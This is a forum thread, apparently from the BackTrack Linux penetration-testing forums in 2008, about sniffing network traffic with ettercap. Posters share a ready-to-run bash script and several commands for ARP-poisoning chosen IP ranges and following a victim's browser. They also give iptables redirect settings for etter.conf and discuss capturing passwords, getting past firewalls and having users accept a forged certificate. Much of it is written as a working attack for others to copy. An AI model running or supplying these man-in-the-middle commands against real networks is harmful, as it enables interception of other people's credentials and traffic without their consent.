Sniffing Tutorial:

**merlin051** · 02-19-2008, 02:13 AM

its probably not a good idea to test that on the school network :P if your unsure of what your doing... not to mention it being a complete breach of the data protection act...

**phoenix910** · 02-19-2008, 07:43 AM

Not quite. I'm not "testing" it on the school network as such. I am testing it on my home network, then in my job as the Network Security dude, I am going to see if our network is vulnerable to it (but obviously in a controlled environment - wouldn't want to steal all the kids email passwords :P - I can't really anyway, I gotta pass everything through my supervisor). About to test it at home just now

Edit: (tested)
Yeah, I can't add a custom host to the hosts list, it has to be found. I can add a custom target, but this does nothing. So I'm gonna have to wait for it to scan through all my subnet, as it scans all of 10.*.*.* so thats 255^3 hosts, that it scans randomly :/ Wish there was an easier way to do this. Ah well, thanks for your guidance.

-Stephen

**toymachineman19** · 02-20-2008, 04:07 AM

thanks for the tutorial, very straight forward.

**phoenix910** · 02-21-2008, 01:02 PM

Figured it out. The only issue was that it was scanning too many hosts, and I couldn't specify what to scan only without using the command line (which I didn't know at the time). For all the lazy people, the following script will work for you. Just copy and paste it into a new file, save as "ettercap_arp.sh" and change permissions with either (in the terminal):
chmod +x ettercap_arp.sh or
chmod 777 ettercap_arp.sh depending on your preference.
Then just run it. Simple.

#!/bin/bash
echo "Enter choice"
echo "Normal is regular ARP Poisoning"
echo "Follow Browser follows remote browser activity"
echo "Quit is simple..."
select CHOICE in Normal FollowBrowser Quit
do
case "$CHOICE" in
"Normal")
echo "Input IP range to scan"
echo ""
echo "Use the format 10.1.1.1-5"
echo "to scan all between, or 10.1.1.1,5 to scan just"
echo "10.1.1.1 and 10.1.1.5"
read IP
echo "Now ARP Poisoning the chosen hosts!"
sudo ettercap -Tq -M arp:remote /$IP/ -P autoadd
;;
"FollowBrowser")
echo "Input single IP"
read IP
echo "Now ARP Poisoning the chosen IP"
sudo ettercap -Tq -M arp:remote /$IP/ -P remote_browser autoadd
;;
"quit")
exit
;;
esac
done

-Stephen

**zignar** · 03-17-2008, 11:39 PM

When I make the arp poisoning, my victim computer can't connect to any site, he don't lose the connection but can't get any site.
Any ideas?

Thanks

**phoenix910** · 03-18-2008, 07:45 AM

Make sure that your IP forwarding is set up correctly, and that you include the router's IP address in the list of those that you are ARP poisoning (or the Default Gateways address if you don't connect directly to the router).
bt ~ # echo 1 > /proc/sys/net/ipv4/ip_forwardf
then
bt ~ # kedit /usr/local/etc/etter.conf
and change this:
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

to this:
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

then an example command:
sudo ettercap -Tq -M arp:remote /10.1.1.1-20/ -P autoadd

-Stephen

**elgros** · 03-20-2008, 01:37 AM

I am testing this on my network and everything works fine. However, when the ''victim'' computer has a firewall turned on, I don't get any passwords or anything else.

Is there a way to get through firewalls ?

**elgros** · 03-20-2008, 02:25 AM

Originally Posted by elgros

I am testing this on my network and everything works fine. However, when the ''victim'' computer has a firewall turned on, I don't get any passwords or anything else.

Is there a way to get through firewalls ?

While this doesn't have anything to do with firewalls, I have just found out that I cant find any hosts using my wireless card, however when using my Ethernet adapter, everything is fine. Any idea what my cause my wifi card to not find any hosts ?

**sifuconman** · 03-21-2008, 12:17 AM

Originally Posted by yeehaw

Hello,

I never thought that my little tutorial would become such a big thread.

I first thought of making a video about this subject, but I think it isn't necessary, but if some people still would like a video tutorial, please tell me.

yeehaw

Ps. Please point out any grammar mistakes I make while typing, so I can make my english better.

A video tutorial would be useful for noobie like me. Looking forward to watching your video tutorial

Thanks

**phoenix910** · 03-21-2008, 02:44 PM

Well, firewalls have nothing to do with it - the website just needs to be right, and the user needs to accept the certificate. In terms of wireless - just make sure you include the gateway in the IP range. The command I usually use is:
sudo ettercap -Tq -M arp:remote /10.1.1.1-5/ -p autoadd (that way it adds any other hosts)

-Stephen

BackTrack Linux - Penetration Testing Distribution

Thread: Sniffing Tutorial:

Thread Tools

Search Thread

Display

Firewall

Posting Permissions